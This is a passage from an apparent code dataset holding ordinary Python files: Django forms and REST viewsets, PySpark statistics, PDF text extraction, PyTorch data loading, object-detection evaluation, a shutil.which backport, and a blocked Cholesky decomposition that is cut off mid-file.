self.instance.is_custom:\n            self.instance.restore(self.instance.identifier, external_auth=ext_auth)\n            self.instance.save()\n\n        messages.add_message(self.request, messages.SUCCESS, METADATA_RESTORING_SUCCESS)\n        user_helper.create_group_activity(self.instance.created_by, self.requesting_user, SERVICE_MD_RESTORED,\n                                          \"{}\".format(self.instance.title, ))\n\n\nclass GeneralAccessSettingsForm(forms.ModelForm):\n    class Meta:\n        model = Metadata\n        fields = ('use_proxy_uri', 'log_proxy_access', 'is_secured')\n        labels = {\n            'use_proxy_uri': _(\"Use proxy\"),\n            'log_proxy_access': _(\"Log proxy activity\"),\n            'is_secured': _(\"Restrict access\"),\n        }\n        help_texts = {\n            'use_proxy_uri': _('Activate to reroute all traffic for this service on MrMap.'),\n            'log_proxy_access': _('Activate to log every traffic activity for this service.'),\n            'is_secured': _('Activate to restrict access on this service')\n        }\n        
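# (added note) 'auto_submit_item' below is presumably a MrMap front-end\n        # hook that re-submits the form when the checkbox is toggled\n        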
widgets = {\n            'is_secured': forms.CheckboxInput(attrs={'class': 'auto_submit_item', }),\n        }\n\n    def __init__(self, *args, **kwargs):\n        super(GeneralAccessSettingsForm, self).__init__(*args, **kwargs)\n\n    def clean(self):\n        cleaned_data = super().clean()\n        use_proxy = cleaned_data.get(\"use_proxy_uri\")\n        log_proxy = cleaned_data.get(\"log_proxy_access\")\n        restrict_access = cleaned_data.get(\"is_secured\")\n\n        # log_proxy and restrict_access can only be activated in combination with use_proxy!\n        if log_proxy and not use_proxy or restrict_access and not use_proxy:\n            self.add_error(\"use_proxy_uri\", forms.ValidationError(\n                _('Log proxy or restrict access without using proxy isn\'t possible!')))\n\n        # raise Exception if user tries to deactivate an externally authenticated service -> not allowed!\n        if self.instance.has_external_authentication and not use_proxy:\n            raise AssertionError(SECURITY_PROXY_DEACTIVATING_NOT_ALLOWED)\n\n        return cleaned_data\n\n    def save(self, commit=True):\n        # todo: just save the fields and implement a signal which detects if one of the three fields has changed.\n        #  the signal can then fire the async task.\n        # todo: maybe we could merge the async processes from steps 1 and 2 of the wizard\n        use_proxy = self.cleaned_data.get(\"use_proxy_uri\", False)\n        log_proxy = self.cleaned_data.get(\"log_proxy_access\", False)\n        restrict_access = self.cleaned_data.get(\"is_secured\", False)\n\n        async_process_securing_access.apply_async((self.instance.id,\n                                                   use_proxy,\n                                                   log_proxy,\n                                                   restrict_access), countdown=settings.CELERY_DEFAULT_COUNTDOWN)\n\n\nclass AllowedOperationForm(forms.ModelForm):\n    class Meta:\n        model = AllowedOperation\n        fields = ('operations', 'allowed_groups', 'allowed_area', 'root_metadata')\n\n        widgets = {\n            'operations': autocomplete.ModelSelect2Multiple(\n                url='editor:operations-autocomplete',\n                attrs={\n                    \"data-containerCss\": {\n                        \"height\": \"3em\",\n                        \"width\": \"3em\",\n                    }\n                },\n            ),\n            'allowed_groups': autocomplete.ModelSelect2Multiple(\n                url='editor:groups',\n                attrs={\n                    \"data-containerCss\": {\n                        \"height\": \"3em\",\n                        \"width\": \"3em\",\n                    }\n                },\n            ),\n            'allowed_area': LeafletWidget(attrs={\n                'map_height': '500px',\n                'map_width': '100%',\n                # 'display_raw': 'true',\n                'map_srid': 4326,\n            }),\n            'root_metadata': forms.HiddenInput(),\n        }\n","sub_path":"mrmap/editor/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":18250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"173968345","text":"# --------------------------------------------------------\n# PYTHON PROGRAM\n# Here is where we are going to define our set of...\n# - Imports\n# - Global Variables\n# - Functions\n# ...to achieve the functionality required.\n# When executing > python 'this_file'.py in a terminal,\n# the Python interpreter will load our program,\n# but it will execute nothing yet.\n# --------------------------------------------------------\n\nimport pyspark\n\nimport pyspark.ml.stat\nimport pyspark.ml.linalg\n\n# ------------------------------------------\n# FUNCTION process_line\n# ------------------------------------------\ndef process_line(line):\n    # 1. We create the output variable\n    res = None\n\n    # 2. We remove the end of line character\n    line = line.replace(\"\\n\", \"\")\n\n    # 3. We split the line by semicolon characters\n    params = line.split(\";\")\n\n    # 4. 
We turn it into a Vector of integers\n    size = len(params)\n    for index in range(size):\n        if (params[index] != \"\"):\n            params[index] = int(params[index])\n        else:\n            params[index] = 0\n    my_vector = pyspark.ml.linalg.Vectors.dense(params)\n\n    # 5. We assign res properly\n    res = (my_vector, )\n\n    # 6. We return res\n    return res\n\n# ------------------------------------------\n# FUNCTION my_main\n# ------------------------------------------\ndef my_main(sc, spark, my_dataset_dir, correlation_method):\n    # 1. Operation C1: We create the RDD from the dataset\n    inputRDD = sc.textFile(my_dataset_dir)\n\n    # 2. Operation T1: We get an RDD of tuples\n    infoRDD = inputRDD.map(process_line)\n\n    # 3. Operation C2: We turn the RDD into a DF\n    inputDF = spark.createDataFrame(infoRDD, [\"features\"])\n\n    # 4. Operation T2: We compute correlation_resultDF\n    correlation_resultDF = pyspark.ml.stat.Correlation.corr(inputDF, \"features\", correlation_method)\n\n    # 5. Operation A1: We take the result from it\n    correlation_matrix = correlation_resultDF.head()\n    print(correlation_matrix)\n\n# ---------------------------------------------------------------\n# PYTHON EXECUTION\n# This is the main entry point to the execution of our program.\n# It provides a call to the 'main function' defined in our\n# Python program, making the Python interpreter trigger\n# its execution.\n# ---------------------------------------------------------------\nif __name__ == '__main__':\n    # 1. We use as many input arguments as needed\n    correlation_method = \"pearson\"\n    #correlation_method = \"spearman\"\n\n    #dataset_file_name = \"pearson_2_vars_dataset.csv\"\n    dataset_file_name = \"pearson_3_vars_dataset.csv\"\n    #dataset_file_name = \"spearman_2_vars_dataset.csv\"\n\n    # 2. Local or Databricks\n    local_False_databricks_True = True\n\n    # 3. We set the path to my_dataset and my_result\n    my_local_path = \"../../../../\"\n    my_databricks_path = \"/\"\n\n    my_dataset_dir = \"FileStore/tables/5_Spark_MachineLearning_Libs/1_Basic_Statistics/\" + dataset_file_name\n\n    if local_False_databricks_True == False:\n        my_dataset_dir = my_local_path + my_dataset_dir\n    else:\n        my_dataset_dir = my_databricks_path + my_dataset_dir\n\n    # 4. We configure the Spark Context\n    sc = pyspark.SparkContext.getOrCreate()\n    sc.setLogLevel('WARN')\n\n    # 5. We configure the Spark Session\n    spark = pyspark.sql.SparkSession.builder.getOrCreate()\n    spark.sparkContext.setLogLevel('WARN')\n    print(\"\\n\\n\\n\")\n\n    # 6. We call our main function\n    my_main(sc, spark, my_dataset_dir, correlation_method)","sub_path":"Big_Data/L15-25_Spark_Environment/Workspace/5_Spark_MachineLearning_Libs/5_2_DataFrames_Based_API/1_Basic_Statistics/p01_correlation.py","file_name":"p01_correlation.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"419107485","text":"from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\nfrom pdfminer.pdfpage import PDFPage\nfrom io import StringIO\ninput_path = \"sample.pdf\"\noutput_path = \"result.txt\"\nrsrcmgr = PDFResourceManager()\n# codec = 'utf-8'\ncodec = 'cp932'\nparams = LAParams()\ntext = \"\"\nwith StringIO() as output:\n    device = TextConverter(rsrcmgr, output, codec=codec, laparams=params)\n    with open(input_path, 'rb') as input:\n        interpreter = PDFPageInterpreter(rsrcmgr, device)\n        for page in PDFPage.get_pages(input):\n            interpreter.process_page(page)\n        text += output.getvalue()\n    device.close()\ntext = text.strip()\nprint(f'output: {text}')\n\nwith open(output_path, \"wb\") as f:\n    f.write(text.encode('utf-8', \"ignore\"))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"455015585","text":"import abc\nimport os\n\nimport numpy as np\nimport scipy.io\nimport torch\nimport torch.utils.data as data\n\n\nclass DataConfig:\n    \"\"\"\n    Data class holding configuration information about a dataset\n    \"\"\"\n\n    def __init__(self, sort_data=True, predict_difference=True, predict_all_dims=True, force_affine=False,\n                 expanded_input=False, y_in_x_space=True):\n        \"\"\"\n\n        :param sort_data: Whether the experiments (data between files) are sorted (by random seed id)\n        :param predict_difference: Whether the prediction should be the state difference or the next state\n        :param predict_all_dims: Whether the prediction should include all state dimensions (some datasets do this regardless)\n        :param force_affine: Whether a column of 1s should be added to XU to make the dataset effectively affine\n        :param expanded_input: Whether the input has extra dimensions (packed in control dimension)\n        :param y_in_x_space: Whether the output is in the same space as state; if not then a lot of assumptions will not hold\n        \"\"\"\n        self.sort_data = sort_data\n        self.predict_difference = predict_difference\n        self.predict_all_dims = predict_all_dims\n        self.force_affine = force_affine\n        self.expanded_input = expanded_input\n        self.y_in_x_space = y_in_x_space\n        # unknown quantities until we encounter data (optional)\n        self.nx = None\n        self.nu = None\n        self.ny = None\n        # sometimes the full input is larger than xu (such as with expanded input)\n        self.n_input = None\n\n    def load_data_info(self, x, u=None, y=None, full_input=None):\n        self.nx = x.shape[1]\n        if u is not None:\n            self.nu = u.shape[1]\n        if y is not None:\n            self.ny = y.shape[1]\n        if full_input is not None:\n            self.n_input = full_input.shape[1]\n        if self.expanded_input and full_input is None:\n            raise RuntimeError(\"Need to load full input with expanded input\")\n\n    def input_dim(self):\n        if not self.nx:\n            raise RuntimeError(\"Need to load data info first before asking for input dim\")\n        if self.n_input:\n            return self.n_input\n        # else assume we're inputting xu\n        ni = self.nx\n        if self.nu:\n            ni += self.nu\n        return ni\n\n    def 
options(self):\n return self.sort_data, self.predict_difference, self.predict_all_dims, self.force_affine, \\\n self.expanded_input, self.y_in_x_space\n\n def __str__(self):\n return \"i{}_o{}_s{}_pd{}_pa{}_a{}_e{}_y{}\".format(self.input_dim(), self.ny,\n *(int(config) for config in self.options()))\n\n def __repr__(self):\n return \"DataConfig(sort_data={}, predict_difference={}, predict_all_dims={}, force_affine={}, \" \\\n \"expanded_input={}, y_in_x_space={})\".format(*self.options())\n\n\nclass DataLoader(abc.ABC):\n \"\"\"\n Driver for loading a dataset from file.\n Each dataset should subclass DataLoader and specialize process file raw data to saved content.\n \"\"\"\n\n def __init__(self, file_cfg=None, config=DataConfig()):\n if file_cfg is None:\n raise RuntimeError(\"Incomplete specification of DataLoader\")\n self.file_cfg = {key: value for key, value in file_cfg.__dict__.items() if\n not key.startswith('_') and isinstance(value, str)}\n self.config = config\n\n @abc.abstractmethod\n def _process_file_raw_data(self, d):\n \"\"\"\n Turn a file's dictionary content into a data sequence, each element of which has the same number of rows\n :param d: file's dictionary content\n :return: tuple of data sequence\n \"\"\"\n\n def load_file(self, full_filename, data):\n raw_data = scipy.io.loadmat(full_filename)\n file_data = self._process_file_raw_data(raw_data)\n if data is None:\n data = list(file_data)\n else:\n for i in range(len(data)):\n data[i] = np.row_stack((data[i], file_data[i]))\n return data\n\n def load(self, dir, override_config=None):\n if override_config:\n self.config = override_config\n data = None\n full_dir = os.path.join(self.file_cfg['DATA_DIR'], dir)\n\n if os.path.isfile(full_dir):\n data = self.load_file(full_dir, data)\n else:\n files = os.listdir(full_dir)\n # consistent with the way MATLAB loads files\n if self.config.sort_data:\n files = sorted(files)\n\n for file in files:\n full_filename = '{}/{}'.format(full_dir, file)\n if os.path.isdir(full_filename):\n continue\n data = self.load_file(full_filename, data)\n return data\n\n\ndef make_affine(X):\n N = X.shape[0]\n return torch.cat((X, torch.ones((N, 1), dtype=X.dtype)), dim=1)\n\n\nclass RandomNumberDataset(data.Dataset):\n def __init__(self, produce_output, num=1000, low=-1, high=1, input_dim=1):\n r = high - low\n self.x = torch.rand((num, input_dim)) * r / 2 + (low + high) / 2\n self.y = produce_output(self.x)\n super(RandomNumberDataset, self).__init__()\n\n def __len__(self):\n return len(self.x)\n\n def __getitem__(self, idx):\n return self.x[idx], self.y[idx]\n\n def get_input(self):\n return self.x\n\n def get_output(self):\n return self.y\n\n\nclass SimpleXUYDataset(data.Dataset):\n def __init__(self, XU, Y):\n self.XU = XU\n self.Y = Y\n super(SimpleXUYDataset, self).__init__()\n\n def __len__(self):\n return len(self.XU)\n\n def __getitem__(self, idx):\n return self.XU[idx], self.Y[idx]\n\n\nclass SimpleDataset(data.Dataset):\n def __init__(self, *sequences):\n self.sequences = sequences\n\n def __len__(self):\n return len(self.sequences[0])\n\n def __getitem__(self, idx):\n return tuple(sequence[idx] if sequence is not None else [] for sequence in self.sequences)\n\n\nclass IndexedDataset(SimpleDataset):\n \"\"\"Same as before, but with last element as the index of the data point for using in Dataloaders\"\"\"\n\n def __getitem__(self, idx):\n return tuple(sequence[idx] if sequence is not None else [] for sequence in self.sequences) + (idx,)\n\n\nclass LoaderXUYDataset(data.Dataset):\n def 
__init__(self, loader: DataLoader, dirs=('raw',), filter_on_labels=None, max_num=None,\n config=DataConfig(), device=\"cpu\"):\n if type(dirs) is str:\n dirs = [dirs]\n self.XU = None\n self.Y = None\n self.labels = None\n for dir in dirs:\n XU, Y, labels = loader.load(dir, config)\n if self.XU is None:\n self.XU = XU\n self.Y = Y\n self.labels = labels\n else:\n self.XU = np.row_stack((self.XU, XU))\n self.Y = np.row_stack((self.Y, Y))\n self.labels = np.row_stack((self.labels, labels[:, :self.labels.shape[1]]))\n self._convert_types(device)\n if filter_on_labels:\n self.XU, self.Y, self.labels = filter_on_labels(self.XU, self.Y, self.labels)\n\n if config.force_affine:\n self.XU = make_affine(self.XU)\n\n if max_num is not None:\n self.XU = self.XU[:max_num]\n self.Y = self.Y[:max_num]\n self.labels = self.labels[:max_num]\n\n super().__init__()\n\n def _convert_types(self, device):\n self.XU = torch.from_numpy(self.XU).to(device=device, dtype=torch.double)\n self.Y = torch.from_numpy(self.Y).to(device=device, dtype=torch.double)\n self.labels = torch.from_numpy(self.labels).to(device=device, dtype=torch.double)\n\n def __len__(self):\n return self.XU.shape[0]\n\n def __getitem__(self, idx):\n return self.XU[idx], self.Y[idx], self.labels[idx]\n\n\ndef split_train_validation(dataset, validation_ratio=0.1):\n # consider giving a shuffle (with np.random.shuffle()) option to permute the data before viewing\n offset = int(len(dataset) * (1 - validation_ratio))\n return data.Subset(dataset, range(0, offset)), data.Subset(dataset, range(offset, len(dataset)))\n\n\ndef merge_data_in_dir(config, dir, out_filename, sort=True):\n full_dir = os.path.join(config.DATA_DIR, dir)\n\n files = os.listdir(full_dir)\n if sort:\n files = sorted(files)\n\n data = None\n for file in files:\n full_filename = '{}/{}'.format(full_dir, file)\n raw_data = scipy.io.loadmat(full_filename)\n if data is None:\n data = raw_data\n else:\n for key in raw_data.keys():\n data[key] = np.row_stack((data[key], raw_data[key]))\n merged_filename = '{}/{}.mat'.format(config.DATA_DIR, out_filename)\n scipy.io.savemat(merged_filename, data)\n","sub_path":"src/arm_pytorch_utilities/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519804098","text":"# Instead just add darknet.py to somewhere in your python path\n# OK actually that might not be a great idea, idk, work in progress\n# Use at your own risk. or don't, i don't care\n\nimport xml.etree.ElementTree as ET\nimport os\nimport cv2\nimport sqlite3 as db\nimport argparse\nimport matplotlib as mpl\nif os.environ.get('DISPLAY', '') == '':\n print('no display found. 
Using non-interactive Agg backend')\n mpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport pickle\n\n\nRED = (0, 0, 255)\nGREEN = (0, 255, 0)\nBLUE = (255, 0, 0)\n\n\nclass Box(object):\n \"\"\"docstring for Box\"\"\"\n\n def __init__(self, cls, x_min, x_max, y_min, y_max, confidence=None):\n self.cls = cls\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.confidence = confidence\n\n\ndef get_GT_boxes(label_filepath):\n in_file = open(os.path.join(label_filepath), 'r')\n tree = ET.parse(in_file)\n root = tree.getroot()\n boxes = []\n for obj in root.iter('object'):\n xmlbox = obj.find('bndbox')\n if obj.find('name').text == 'boat':\n boxes.append(Box(obj.find('name').text, float(xmlbox.find('xmin').text), float(\n xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text)))\n return boxes\n\n\ndef get_intersected_area(box1, box2):\n dx = min(box1.x_max, box2.x_max) - max(box1.x_min, box2.x_min)\n dy = min(box1.y_max, box2.y_max) - max(box1.y_min, box2.y_min)\n if dy <= 0 or dx <= 0:\n return -1\n else:\n return dx * dy\n\n\ndef get_iou(box1, box2):\n area_box1 = (box1.x_max - box1.x_min) * (box1.y_max - box1.y_min)\n area_box2 = (box2.x_max - box2.x_min) * (box2.y_max - box2.y_min)\n intersected_area = get_intersected_area(box1, box2)\n # print(intersected_area)\n if intersected_area == -1:\n return -1\n else:\n return intersected_area / (area_box1 + area_box2 - intersected_area)\n\n\ndef valid_detection(detected_box, gt_box, iou_thresh=0.5):\n return get_iou(detected_box, gt_box) >= iou_thresh\n\n\ndef get_detections_stats(conn, data_path, iou_thresh, confidence_thresh=0.25):\n true_positives = 0\n num_detections = 0\n num_gt_boxes = 0\n c = conn.cursor()\n test_file = open(os.path.join(data_path, 'model', 'test.txt'), 'r')\n image_filepaths = test_file.readlines()\n test_file.close()\n for img in image_filepaths:\n gt_boxes = get_GT_boxes(os.path.join((img.strip()[:-4] + '.xml')))\n c.execute('SELECT * FROM detections WHERE image_name=? and confidence>=? 
and class_name=?',\n (img.strip(), confidence_thresh, 'boat'))\n detections = c.fetchall()\n num_detections += len(detections)\n for gt_box in gt_boxes:\n for i in range(len(detections) - 1, -1, -1):\n detected_box = Box(detections[i][5], detections[i][1], detections[i]\n [2], detections[i][3], detections[i][4], detections[i][6])\n if detected_box.confidence >= confidence_thresh:\n if valid_detection(detected_box, gt_box, iou_thresh=iou_thresh):\n true_positives += 1\n detections.remove(detections[i])\n break\n num_gt_boxes += len(gt_boxes)\n print('TP: ', true_positives, ' num_detections: ',\n num_detections, ' num_gt: ', num_gt_boxes)\n return [true_positives, num_detections, num_gt_boxes]\n\n\ndef get_precision_recall(conn, data_path, iou_thresh, confidence_thresh=0.25):\n [true_positives, num_detections, num_gt_boxes] = get_detections_stats(conn, data_path, iou_thresh, confidence_thresh)\n precision = 0\n if num_detections > 0:\n precision = float(true_positives) / float(num_detections)\n recall = 0\n if num_gt_boxes > 0:\n recall = float(true_positives) / float(num_gt_boxes)\n return (precision, recall)\n\n\ndef get_confusion_matrix(conn, data_path, iou_thresh, confidence_thresh=0.25):\n [true_positives, num_detections, num_gt_boxes] = get_detections_stats(conn, data_path, iou_thresh, confidence_thresh)\n false_positives = num_detections - true_positives\n false_negatives = num_gt_boxes - true_positives\n file = open(os.path.join(data_path, 'results', 'confusion_matrix.txt'), 'w')\n file.write('true_positives = ' + str(true_positives) + '\\n')\n file.write('false_positives = ' + str(false_positives) + '\\n')\n file.write('false_negatives = ' + str(false_negatives) + '\\n')\n file.write('num_detections = ' + str(num_detections) + '\\n')\n file.write('num_gt_boxes = ' + str(num_gt_boxes) + '\\n')\n file.close()\n return [true_positives, false_positives, false_negatives]\n\n\ndef save_images_with_boxes(conn, data_path, conf_thresh=0.25):\n c = conn.cursor()\n test_file = open(os.path.join(data_path, 'model', 'test.txt'), 'r')\n image_filepaths = test_file.readlines()\n test_file.close()\n i = 0\n for img in image_filepaths:\n img_name = img.strip().split('/')[-1]\n gt_boxes = get_GT_boxes(os.path.join(\n '', (img.strip()[:-4] + '.xml')))\n c.execute('SELECT * FROM detections WHERE image_name=? 
AND confidence>=?',\n (img.strip(), conf_thresh))\n detections = c.fetchall()\n image = cv2.imread(img.strip())\n print(img.strip())\n if image is None:\n print('No image')\n exit()\n for box in gt_boxes:\n cv2.rectangle(image, (int(box.x_min), int(box.y_max)),\n (int(box.x_max), int(box.y_min)), GREEN, 6)\n for box in detections:\n if (box[5] == 'building'):\n color = BLUE\n else:\n color = RED\n cv2.rectangle(image, (int(box[1]), int(box[3])),\n (int(box[2]), int(box[4])), color, 6)\n cv2.imwrite(os.path.join(data_path, 'results',\n img_name), image)\n i += 1\n\n\ndef write_prec_recall_to_file(data_path, precisions, recalls, name='SSD'):\n file = open(os.path.join(data_path, 'results', 'prec_recalls.txt'), 'w')\n file.write(name + '\\n')\n for i in range(len(precisions)):\n file.write(str(precisions[i]))\n if i != len(precisions):\n file.write(' ')\n file.write('\\n')\n for i in range(len(recalls)):\n file.write(str(recalls[i]))\n if i != len(recalls):\n file.write(' ')\n file.write('\\n')\n file.close()\n\n\ndef main(data_path):\n conn = db.connect(os.path.join(data_path, 'results', 'detections.db'))\n save_images_with_boxes(conn, data_path)\n conf_threshs = [x * 0.01 for x in range(0, 100)]\n precisions = []\n recalls = []\n for conf_thresh in conf_threshs:\n (precision, recall) = get_precision_recall(\n conn, data_path, 0.5, conf_thresh)\n precisions.append(precision)\n recalls.append(recall)\n print(precisions)\n print(recalls)\n write_prec_recall_to_file(data_path, precisions, recalls)\n get_confusion_matrix(conn, data_path, 0.5)\n # print(get_precision_recall(conn, data_path, 0.5))\n plt.plot(recalls, precisions)\n plt.grid(True)\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.savefig(os.path.join(data_path, 'results', 'prec_recall.png'))\n conn.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Input path to darknet')\n parser.add_argument('DATA_PATH', type=str, nargs=1,\n help='Set path to data folder, containg datasets')\n args = parser.parse_args()\n DATA_PATH = args.DATA_PATH[0]\n main(DATA_PATH)\n","sub_path":"ssd/test_ssd.py","file_name":"test_ssd.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310381267","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/nori/which.py\n# Compiled at: 2013-10-03 18:50:13\n\"\"\"\nBackport of Python 3.3's shutil.which().\nRequires 2.6+, for sets.\n\"\"\"\nimport sys\nif sys.hexversion >= 50528256:\n from shutil import which\nelse:\n import os\n\n def which(cmd, mode=os.F_OK | os.X_OK, path=None):\n \"\"\"Given a command, mode, and a PATH string, return the path which\n conforms to the given mode on the PATH, or None if there is no such\n file.\n\n `mode` defaults to os.F_OK | os.X_OK. 
`path` defaults to the result\n        of os.environ.get(\"PATH\"), or can be overridden with a custom search\n        path.\n\n        \"\"\"\n\n        def _access_check(fn, mode):\n            return os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)\n\n        if os.path.dirname(cmd):\n            if _access_check(cmd, mode):\n                return cmd\n            return\n        if path is None:\n            path = os.environ.get('PATH', os.defpath)\n        if not path:\n            return\n        else:\n            path = path.split(os.pathsep)\n        if sys.platform == 'win32':\n            if os.curdir not in path:\n                path.insert(0, os.curdir)\n            pathext = os.environ.get('PATHEXT', '').split(os.pathsep)\n            if any(cmd.lower().endswith(ext.lower()) for ext in pathext):\n                files = [\n                 cmd]\n            else:\n                files = [ cmd + ext for ext in pathext ]\n        else:\n            files = [\n             cmd]\n        seen = set()\n        for dir in path:\n            normdir = os.path.normcase(dir)\n            if normdir not in seen:\n                seen.add(normdir)\n                for thefile in files:\n                    name = os.path.join(dir, thefile)\n                    if _access_check(name, mode):\n                        return name\n\n        return","sub_path":"pycfiles/nori-1.0.linux-x86_64.tar/which.py","file_name":"which.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"368220650","text":"from rest_framework import viewsets, permissions\n\nfrom . import serializers\nfrom . import models\n\n\nclass procedure_s9ViewSet(viewsets.ModelViewSet):\n    \"\"\"ViewSet for the procedure_s9 class\"\"\"\n\n    queryset = models.procedure_s9.objects.all()\n    serializer_class = serializers.procedure_s9Serializer\n    permission_classes = [permissions.IsAuthenticated]\n\n\nclass chantier_seViewSet(viewsets.ModelViewSet):\n    \"\"\"ViewSet for the chantier_se class\"\"\"\n\n    queryset = models.chantier_se.objects.all()\n    serializer_class = serializers.chantier_seSerializer\n    permission_classes = [permissions.IsAuthenticated]\n\n\nclass ttxViewSet(viewsets.ModelViewSet):\n    \"\"\"ViewSet for the ttx class\"\"\"\n\n    queryset = models.ttx.objects.all()\n    serializer_class = serializers.ttxSerializer\n    permission_classes = [permissions.IsAuthenticated]\n\n\nclass personelViewSet(viewsets.ModelViewSet):\n    \"\"\"ViewSet for the personel class\"\"\"\n\n    queryset = models.personel.objects.all()\n    serializer_class = serializers.personelSerializer\n    permission_classes = [permissions.IsAuthenticated]\n\n\nclass info_chantierViewSet(viewsets.ModelViewSet):\n    \"\"\"ViewSet for the info_chantier class\"\"\"\n\n    queryset = models.info_chantier.objects.all()\n    serializer_class = serializers.info_chantierSerializer\n    permission_classes = [permissions.IsAuthenticated]\n","sub_path":"logiciel_s6/logiciel_s6_project/info_base_chantier/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"277056358","text":"\n\nfrom xai.brain.wordbase.nouns._price import _PRICE\n\n#class header\nclass _PRICES(_PRICE, ):\n\tdef __init__(self,): \n\t\t_PRICE.__init__(self)\n\t\tself.name = \"PRICES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"price\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_prices.py","file_name":"_prices.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"234629302","text":"# Prompt: https://leetcode.com/problems/intersection-of-two-arrays/\n\n# Runtime: 44 ms, faster than 36.06% of Python online submissions for Intersection of Two Arrays.\n# Memory Usage: 11.9 MB, less than 5.86% 
of Python online submissions for Intersection of Two Arrays.\n\nclass Solution(object):\n def intersection(self, nums1, nums2):\n bigger = nums1 if len(nums1) > len(nums2) else nums2\n smaller = nums2 if len(nums1) > len(nums2) else nums1\n # turn smaller list into a set\n smaller = set(smaller)\n # loop through bigger list & see if any in there are in smaller set\n output = []\n for elem in bigger:\n if elem in smaller:\n output.append(elem)\n smaller.remove(elem)\n return output\n","sub_path":"0. Easy/0349. Intersection of Two Arrays/array_intersect.py","file_name":"array_intersect.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14530043","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\n# For better print formatting\nfrom __future__ import print_function\n\n# Imports\nfrom pycompss.api.constraint import constraint\nfrom pycompss.api.task import task\nfrom pycompss.api.api import compss_barrier\nfrom pycompss.api.api import compss_wait_on\n\nimport numpy as np\n\n\n############################################\n# MATRIX GENERATION\n############################################\n\ndef generate_matrix(m_size, b_size):\n mat = []\n for i in range(m_size):\n mat.append([])\n for _ in range(m_size):\n mat[i].append([])\n\n for i in range(m_size):\n mat[i][i] = create_block(b_size, True)\n for j in range(i + 1, m_size):\n mat[i][j] = create_block(b_size, False)\n\n # Make it symmetric\n for i in range(m_size):\n mat[i][i] = compss_wait_on(mat[i][i])\n for j in range(i + 1, m_size):\n mat[i][j] = compss_wait_on(mat[i][j]) # To break aliasing between future objects\n mat[j][i] = mat[i][j]\n\n return mat\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef create_block(b_size, is_diag):\n import os\n np.random.seed(ord(os.urandom(1)))\n block = np.array(np.random.random((b_size, b_size)), dtype=np.float64, copy=False)\n\n mb = np.matrix(block, dtype=np.float64, copy=False)\n mb = mb + np.transpose(mb)\n if is_diag:\n mb = mb + 2 * b_size * np.eye(b_size)\n return mb\n\n\n############################################\n# MAIN FUNCTION\n############################################\n\ndef cholesky_blocked(a, m_size, b_size):\n # Debug\n if __debug__:\n a = compss_wait_on(a)\n print(\"Matrix A:\")\n print(a)\n\n # Compute expected result\n if __debug__:\n from numpy.linalg import cholesky as cholesky_numpy\n res_expected = cholesky_numpy(join_matrix(a))\n\n # Cholesky decomposition\n for k in range(m_size):\n # Diagonal block factorization\n a[k][k] = potrf(a[k][k])\n\n # Triangular systems\n for i in range(k + 1, m_size):\n a[i][k] = solve_triangular(a[k][k], a[i][k])\n a[k][i] = np.zeros((b_size, b_size))\n\n # Update trailing matrix\n for i in range(k + 1, m_size):\n for j in range(i, m_size):\n a[j][i] = gemm(-1.0, a[j][k], a[i][k], a[j][i], 1.0)\n # Only for A=B\n # a[j][i] = syrk(a[j][k], a[j][i])\n\n # Debug result\n if __debug__:\n a = compss_wait_on(a)\n res = join_matrix(a)\n\n print(\"New Matrix A:\")\n print(res)\n\n # Check result\n if __debug__:\n check_result(res, res_expected)\n\n\n############################################\n# MATHEMATICAL FUNCTIONS\n############################################\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef potrf(a):\n from scipy.linalg.lapack import dpotrf\n a = dpotrf(a, lower=True)[0]\n return a\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=list)\ndef 
